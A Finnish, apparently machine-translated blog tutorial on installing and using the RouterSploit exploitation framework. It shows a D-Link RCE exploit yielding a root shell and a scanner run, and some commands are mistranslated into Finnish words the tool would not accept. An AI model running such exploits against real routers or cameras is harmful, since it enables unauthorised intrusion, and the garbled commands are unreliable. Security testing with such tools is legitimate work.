Linux-työkalut

RouterSploit – Exploitation Framework Complete Tutorial [2020]

RouterSploit on hämmästyttävä hyödyntämiskehys, joka on tehty erityisesti sulautetuille laitteille.

Pentester voi käyttää tätä työkalua kameroiden ja reitittimien turvallisuuden tarkistamiseen.

RouterSploit Highlights:

  • Koodattu Pythonissa.
  • Komentorivikäyttöliittymä.
  • Docker-tuki.
  • Modulaariset työkalut.

Tuettu käyttöjärjestelmä:

  1. Mac käyttöjärjestelmä.
  2. Linux.
  3. Android-puhelin.
  4. Windows.

RouterSploitin asentaminen:

Vaatimukset:

  • tulevaisuutta
  • pyynnöt
  • paramiko
  • pysnmp
  • pycrypto

Valinnainen:

  • bluepy – bluetooth low energy

Asennus Kali Linuxiin:

Noudata alla olevia komentoja:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy -tuki:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Asennus Ubuntuun:

Noudata alla olevia komentoja:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy -tuki:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Asennus MacOS:ään:

Noudata alla olevia komentoja:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Asennus Dockeriin:

Noudata alla olevia komentoja:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Kuinka päivittää RouterSploit?

Sinun on päivitettävä RouterSploit usein hankaluuksien välttämiseksi.

Uusia moduuleja toimitetaan lähes joka päivä.

cd routersploit
git pull

RouterSploitin käyttäminen?

Käyttö

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Hyödyntäminen Framework for    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Kotisivu   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Skannerit: 4 Creds: 165 Yleinen: 4 Hyötykuormat: 32 Enkooderit: 6

rsf >

Hyökkäykset:

Edistää hyväksikäyttöä, valitse vain moduuli ja aseta tavoite:

rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Täydennä sarkainnäppäintä.

Vaihtoehtojen näyttäminen, tyyppi show:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Nimi Nykyiset asetukset Kuvaus                                
   ----       ----------------     -----------                                
   kohde Kohdeosoite esim. http://192.168.1.1     
   portti       80                   Kohdeportti

Käyttää run tai exploit komento hyödyntää kohdetta:

rsf (D-LINK DIR-300 & DIR-600 RCE) > juosta
[+] Kohde on haavoittuvainen
[*] Kutsutaan komentosilmukkaa...
cmd > whoami
root

Vaihtoehtojen asettaminen:

rsf (D-LINK DIR-300 & DIR-600 RCE) > aseta tavoite http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

On mahdollista tarkistaa, onko kohde alttiina tietylle hyväksikäytölle:

rsf (D-LINK DIR-300 & DIR-600 RCE) > tarkistaa
[+] Kohde on haavoittuvainen

Juosta show info näyttääksesi tietoja hyväksikäytöstä.

Haavoittuvien kohteiden etsiminen:

Skannerit mahdollistavat nopean varmistuksen, onko kohde alttiina hyväksikäytölle.

Käytä samoja komentoja vaihtoehtojen näyttämiseen/asettamiseksi, ja myös juosta.

rsf (D-Link skanneri) > juosta
[+] exploits/dlink/dwr_932_info_disclosure on haavoittuvainen
[-] exploits/dlink/dir_300_320_615_auth_bypass ei ole haavoittuvainen
[-] exploits/dlink/dsl_2750b_info_disclosure ei ole haavoittuvainen
[-] exploits/dlink/dns_320l_327l_rce ei ole haavoittuvainen
[-] exploits/dlink/dir_645_password_disclosure ei ole haavoittuvainen
[-] exploits/dlink/dir_300_600_615_info_disclosure ei ole haavoittuva
[-] exploits/dlink/dir_300_600_rce ei ole haavoittuvainen

[+] Laite on haavoittuvainen!
- exploits/dlink/dwr_932_info_disclosure

Virallinen RouterSploit

Lue myös: 1337x välityspalvelin

Viimeiset sanat:

RouterSploit on mahtava työkalu käyttää.

Jos kohtaat ongelmia liittyen RouterSploit. Muista kommentoida alle. Tiimimme CSHAWK ottaa sinuun yhteyttä mahdollisimman pian.

Suyash

Tämä on Suyash Intiasta. Kyberturvallisuudesta innostunut, Youtuberi, Blogger, Freelancer ja pentesteri. Hän kirjoittaa yleensä artikkeleita jakaakseen tietonsa maailman kanssa.

Recent Posts

Top Apps and Software for Budding Musicians

With the rise of many technological trends, all industries are reaping the benefits. Different technologies

2 years ago

Yläosa 9 Tips to Keep Yourself Safe When Gaming Online

Online gaming is the latest normal in today’s fast-paced digital world. The internet now offers

2 years ago

Pros And Cons Of Getting A Tax Extension for Your Fintech Business

Tax season: the time of year many individuals and businesses dread. The weight of ensuring

2 years ago

Yläosa 5 Games Which Became Most Popular in 2023 – Detailed Review!

As we enter in the final months of 2023, we can talk more clearly about

2 years ago

Tuleeko Minecraft Legend koskaan ilmaiseksi?

Since its release in 2011, Minecraft has become one of the most played video games

2 years ago

Voiko Minecraft Javaa pelata Xboxilla?

Minecraft has been active for more than a decade, and in that time it has

2 years ago

This website uses cookies.